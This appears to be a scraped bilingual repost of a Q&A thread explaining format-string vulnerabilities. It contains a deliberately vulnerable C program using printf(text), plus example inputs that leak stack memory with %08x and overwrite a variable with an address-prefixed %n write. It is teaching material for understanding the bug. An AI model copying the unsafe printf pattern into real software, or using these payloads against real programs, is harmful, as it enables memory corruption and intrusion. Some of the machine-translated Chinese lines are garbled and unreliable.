如何才能格式化字符串漏洞被利用？ [英] How can a Format-String vulnerability be exploited?

问题描述

我阅读有关code的漏洞和过这个的格式串漏洞来的。

I was reading about vulnerabilities in code and came across this Format-String Vulnerability.

维基百科说：

格式串漏洞，当程序员希望最常出现
  打印包含用户提供的数据的字符串。程序员可
  误写的printf（缓冲），而不是的printf（％S，缓冲）。该
  第一个版本间$ P $点缓冲区格式字符串，并解析任何
  格式说明它可能包含。第二个版本只是
  打印字符串到屏幕上，作为编程意。

Format string bugs most commonly appear when a programmer wishes to print a string containing user supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended.

我得到的printf（缓冲）版本的问题，但我仍然没有得到怎么这个漏洞可以通过攻击者用来执行有害code。有人可以告诉我怎么这个漏洞可以通过一个例子来的开发

I got the problem with printf(buffer) version, but I still didn't get how this vulnerability can be used by attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited by an example?

推荐答案

您可能能够利用多方面的格式字符串漏洞，直接或间接地。让我们用下面为例（假设没有相关的操作系统的保护，这是非常难得反正）：

You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):

int main(int argc, char **argv)
{
    char text[1024];
    static int some_value = -72;

    strcpy(text, argv[1]); /* ignore the buffer overflow here */

    printf("This is how you print correctly:\n");
    printf("%s", text);
    printf("This is how not to print:\n");
    printf(text);

    printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
    return(0);
}

此漏洞的基础是具有可变参数的函数的行为。它实现处理的参数可变数量的函数从堆栈中读取它们，本质上。如果我们指定格式的字符串，这将使的printf（）预计在栈上两个整数的，我们只提供一个参数，第二个将要对别的东西堆叠。推而广之，如果我们能控制的格式字符串，我们可以有两个最根本的原语：

The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:

重要：我正在对这里的栈帧布局一些假设。您可以忽略他们，如果你了解背后的脆弱性的基本premise，他们跨操作系统平台，程序和配置反正有所不同。

IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.

这是可以使用％S format参数读取数据。您可以读取原始格式字符串在的printf数据（文本），因此你可以用它来读什么出栈：

It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:

./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value @ 0x08049794 = -72 [0xffffffb8]

---

写任意内存地址

您可以使用％N 格式说明写入到任意地址（几乎）。同样，假设我们上面的漏洞程序，让我们尝试改变 SOME_VALUE 的值，它位于 0x08049794 ，如上所示：

---

Writing to arbitrary memory addresses

You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:

./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value @ 0x08049794 = 31 [0x0000001f]

我们已经覆盖 SOME_VALUE 与％N 遇到符（<$之前写的字节数C $ C>男人的printf ）。我们可以使用格式字符串本身，或字段宽度来控制这个值：

We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:

./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value @ 0x08049794 = 21 [0x00000015]

有很多可能性和技巧去尝试（直接参数访问，大视场宽度使得环绕可能，建立自己的原语），而这刚好接触到冰山一角。我建议阅读格式化字符串漏洞的文章（Phrack有一些优秀的大多​​是那些，虽然他们可能会有点高级）或一本书，倒是这个问题。

There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.

免责声明：都是从书上所采取的例子[虽然不是逐字]的黑客：开采的艺术（第二版）的由Jon埃里克森

Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.

这篇关于如何才能格式化字符串漏洞被利用？的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！